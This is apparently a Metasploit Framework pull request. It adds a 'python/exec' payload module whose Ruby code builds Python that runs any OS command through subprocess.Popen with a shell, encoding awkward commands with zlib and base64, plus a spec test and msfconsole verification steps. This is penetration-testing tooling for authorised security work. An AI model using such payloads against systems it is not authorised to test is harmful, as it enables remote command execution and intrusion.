### PR TITLE
Add a python/exec payload to execute OS commands

### DIFF
--- a/modules/payloads/singles/python/exec.rb
+++ b/modules/payloads/singles/python/exec.rb
@@ -1,0 +1,56 @@
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Payload::Python
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Python Execute Command',
+        'Description' => 'Execute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.',
+        'Author' => 'Spencer McIntyre',
+        'License' => MSF_LICENSE,
+        'Platform' => 'python',
+        'Arch' => ARCH_PYTHON,
+        'PayloadType' => 'python',
+        'Payload' => {
+          'Offsets' => {},
+          'Payload' => ''
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('CMD', [ true, 'The command string to execute' ]),
+      ]
+    )
+  end
+
+  def generate(_opts = {})
+    super + command_string
+  end
+
+  def command_string
+    py_code = %(from subprocess import Popen,PIPE\n)
+
+    # try to just use raw strings if nothing would need to be escaped
+    if !datastore['CMD'].include?("'")
+      py_code << %(args=[r'#{datastore['CMD']}']\n)
+    elsif !datastore['CMD'].include?('"')
+      py_code << %(args=[r"#{datastore['CMD']}"]\n)
+    elsif !datastore['CMD'].include?("'''")
+      py_code << %(args=[r'''#{datastore['CMD']}''']\n)
+    elsif !datastore['CMD'].include?('"""')
+      py_code << %(args=[r"""#{datastore['CMD']}"""]\n)
+    else
+      encoded = Rex::Text.encode_base64(Rex::Text.zlib_deflate(datastore['CMD']))
+      py_code << %{import zlib,base64;args=[zlib.decompress(base64.b64decode('#{encoded}')).decode()]\n}
+    end
+
+    py_code << %{Popen(args,shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)\n}
+
+    py_create_exec_stub(py_code)
+  end
+end

--- a/modules/payloads/singles/python/exec.rb
+++ b/modules/payloads/singles/python/exec.rb
@@ -1,5 +1,5 @@
 module MetasploitModule
-  CachedSize = :dynamic
+  CachedSize = 248
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2853,6 +2853,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'php/shell_findsock'
   end
 
+  context 'python/exec' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/python/exec'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/exec'
+  end
+
   context 'python/meterpreter/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This adds a single ARCH_PYTHON payload that is capable of executing arbitrary OS commands. It uses subprocess.Popen to execute commands through a shell environment as defined in [the docs](https://docs.python.org/3/library/subprocess.html#subprocess.Popen). Tested with Python 2.7, 3.4 and 3.12.

## Verification

- [ ] Start `msfconsole`
- [ ] `use payload/python/exec`
- [ ] `set CMD somecommand` (try and trick it with quotes and what not, make sure it works as intended)
